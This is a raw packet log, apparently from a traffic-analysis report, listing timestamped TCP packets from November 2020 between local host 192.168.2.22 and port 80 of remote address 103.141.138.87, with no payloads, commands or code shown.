                              Nov 20, 2020 11:27:52.707318068 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707333088 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707349062 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707365036 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707384109 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707401037 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707418919 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707438946 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707448959 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707458973 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707465887 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707504034 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707530022 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707541943 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707560062 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707587957 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707607031 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707624912 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707629919 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707638025 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707658052 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707664013 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707681894 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707701921 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707725048 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707732916 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707747936 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707763910 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707779884 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707787037 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707798004 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707820892 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707830906 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707891941 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707896948 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707926989 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707945108 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707961082 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.707972050 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.707981110 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708000898 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708017111 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708036900 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708046913 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708055973 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708074093 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708091974 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708112001 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708117008 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708127022 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708142042 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708152056 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708169937 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708187103 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708205938 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708211899 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708219051 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708240986 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708257914 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708278894 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708283901 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708287954 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708303928 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708314896 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708331108 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708348036 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708390951 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708396912 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708400965 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708425045 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708456993 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708492994 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708514929 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708545923 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708556890 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708600044 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708606958 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708646059 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708652020 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708682060 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708694935 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708720922 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708729029 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708756924 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.708766937 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.708794117 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711321115 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711349010 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711374044 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711396933 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711421967 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711448908 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711464882 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711467981 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711478949 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711499929 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711523056 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711544991 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711558104 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711568117 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711587906 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711610079 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711632013 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711646080 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711654902 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711675882 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711697102 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711719990 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711738110 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711745977 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711769104 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711791992 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711811066 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711827040 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711841106 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711862087 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711883068 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711904049 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711918116 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.711932898 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711954117 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711978912 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.711998940 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712009907 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712037086 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712059021 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712079048 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712094069 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712106943 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712126017 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712141991 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712161064 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712182045 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712203979 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712219954 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712229013 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712250948 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712271929 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712295055 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712307930 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712320089 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712342024 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712363005 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712385893 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712399960 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712414026 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712434053 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712455988 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712480068 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712492943 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712506056 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712528944 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712549925 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712574005 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712589025 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712596893 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712619066 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712640047 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712662935 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712677002 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712687016 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712707996 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712737083 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712758064 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712773085 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712785006 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712806940 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712829113 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712852001 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712867022 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712876081 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712897062 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712918043 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712941885 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.712954044 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712965965 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.712980986 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713001013 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713020086 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713041067 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713066101 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713079929 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713088989 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713112116 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713134050 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713156939 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713172913 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713184118 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713206053 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713227034 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713248968 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713264942 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713279963 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713300943 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713326931 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713346004 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713362932 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713376999 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713418961 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713442087 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713471889 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713485003 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713501930 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713522911 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713542938 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713573933 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713584900 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713589907 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713604927 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713625908 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713644028 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713668108 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713690996 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713704109 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713716984 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713737965 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713759899 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713783979 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713798046 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713805914 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713829041 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713849068 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713874102 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713885069 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713895082 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713923931 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713934898 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.713958979 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.713980913 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714011908 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714019060 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714025974 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714042902 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714062929 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714083910 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714103937 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714128971 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714143991 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714152098 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714175940 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714196920 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714221954 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714237928 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714243889 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714266062 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714286089 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714310884 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714323044 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714335918 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714356899 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714378119 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714401960 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714418888 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714427948 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714448929 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714469910 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714493036 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714509010 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714517117 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714536905 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714556932 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714585066 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714591980 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714597940 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714618921 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714632988 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714653969 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714679003 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714698076 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714705944 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714729071 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714751005 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714777946 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714792013 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714797974 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714819908 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714838982 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714858055 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714878082 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714904070 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714917898 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714926004 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.714950085 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.714972019 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715003014 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715012074 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715015888 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715045929 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715058088 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715080023 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715101004 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715125084 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715140104 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715147972 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715172052 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715193987 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715219975 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715234041 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715246916 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715270042 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715291023 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715322018 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715331078 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715336084 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715357065 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715379953 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715398073 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715419054 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715445995 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715455055 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715465069 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715486050 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715506077 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715534925 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715542078 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715549946 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715568066 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715586901 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715605974 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715626955 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715651035 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715666056 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715672970 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715696096 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715720892 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715744972 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715756893 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715764999 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715784073 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715802908 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715821981 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715841055 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715867043 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715879917 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715890884 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715910912 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715935946 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.715956926 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715970039 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.715984106 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.716006041 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.716026068 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.716052055 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.716064930 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.720599890 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720635891 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720648050 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720664024 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720685005 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720704079 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720726967 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720746994 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720769882 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.720786095 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.720798969 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.720815897 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.720835924 CET8049167103.141.138.87192.168.2.22
